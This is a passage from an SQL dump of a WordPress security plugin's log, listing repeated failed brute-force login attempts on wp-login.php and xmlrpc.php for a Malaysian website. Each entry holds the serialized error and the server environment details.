The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"68.183.29.98\";s:11:\"REMOTE_PORT\";s:5:\"59364\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG1p61FqYKvioG46Y4m7gAAAI0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568781736.0228\";s:12:\"REQUEST_TIME\";s:10:\"1568781736\";}}','notice','2019-09-18 04:42:17','2019-09-18 04:42:16',18259712,19560120,'https://bintara.com.my/xmlrpc.php',1,0,'68.183.29.98'),(24908,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"208.87.96.179\";s:11:\"REMOTE_PORT\";s:5:\"51176\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG2@q1FqYKvioG46Y4nswAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568782074.5055\";s:12:\"REQUEST_TIME\";s:10:\"1568782074\";}}','notice','2019-09-18 04:47:55','2019-09-18 04:47:54',17742000,19231664,'https://bintara.com.my/wp-login.php',1,0,'208.87.96.179'),(24909,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"208.87.96.179\";s:11:\"REMOTE_PORT\";s:5:\"53132\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG2-a1FqYKvioG46Y4ntgAAAIw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568782077.6759\";s:12:\"REQUEST_TIME\";s:10:\"1568782077\";}}','notice','2019-09-18 04:47:59','2019-09-18 04:47:58',18260272,19559456,'https://bintara.com.my/xmlrpc.php',1,0,'208.87.96.179'),(24910,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.161.114.244\";s:11:\"REMOTE_PORT\";s:5:\"46300\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG4kSqbKGlf1IVly7Oc@wAAAVE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568782481.9811\";s:12:\"REQUEST_TIME\";s:10:\"1568782481\";}}','notice','2019-09-18 04:54:43','2019-09-18 04:54:42',17742432,19233888,'https://bintara.com.my/wp-login.php',1,0,'195.161.114.244'),(24911,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.161.114.244\";s:11:\"REMOTE_PORT\";s:5:\"47106\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG4lEQGijxhVPhG1M0SZgAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568782485.0642\";s:12:\"REQUEST_TIME\";s:10:\"1568782485\";}}','notice','2019-09-18 04:54:46','2019-09-18 04:54:45',18259888,19557704,'https://bintara.com.my/xmlrpc.php',1,0,'195.161.114.244'),(24912,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"209.15.37.34\";s:11:\"REMOTE_PORT\";s:5:\"48006\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG4zSR0vdvYEIduPCLahwAAAQw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568782542.0308\";s:12:\"REQUEST_TIME\";s:10:\"1568782542\";}}','notice','2019-09-18 04:55:43','2019-09-18 04:55:42',17741376,19233552,'https://bintara.com.my/wp-login.php',1,0,'209.15.37.34'),(24913,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"209.15.37.34\";s:11:\"REMOTE_PORT\";s:5:\"48432\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG40K1FqYKvioG46Y4o0wAAAJA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568782544.8987\";s:12:\"REQUEST_TIME\";s:10:\"1568782544\";}}','notice','2019-09-18 04:55:46','2019-09-18 04:55:45',18257280,19555064,'https://bintara.com.my/xmlrpc.php',1,0,'209.15.37.34'),(24914,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"149.56.38.19\";s:11:\"REMOTE_PORT\";s:5:\"44036\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG6Xa1FqYKvioG46Y4puQAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568782941.4008\";s:12:\"REQUEST_TIME\";s:10:\"1568782941\";}}','notice','2019-09-18 05:02:22','2019-09-18 05:02:21',17741640,19234008,'https://bintara.com.my/wp-login.php',1,0,'149.56.38.19'),(24915,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"149.56.38.19\";s:11:\"REMOTE_PORT\";s:5:\"44604\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG6YG4SfF9g@8lNlxww8AAAAEg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568782944.4916\";s:12:\"REQUEST_TIME\";s:10:\"1568782944\";}}','notice','2019-09-18 05:02:25','2019-09-18 05:02:24',18260216,19558448,'https://bintara.com.my/xmlrpc.php',1,0,'149.56.38.19'),(24916,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 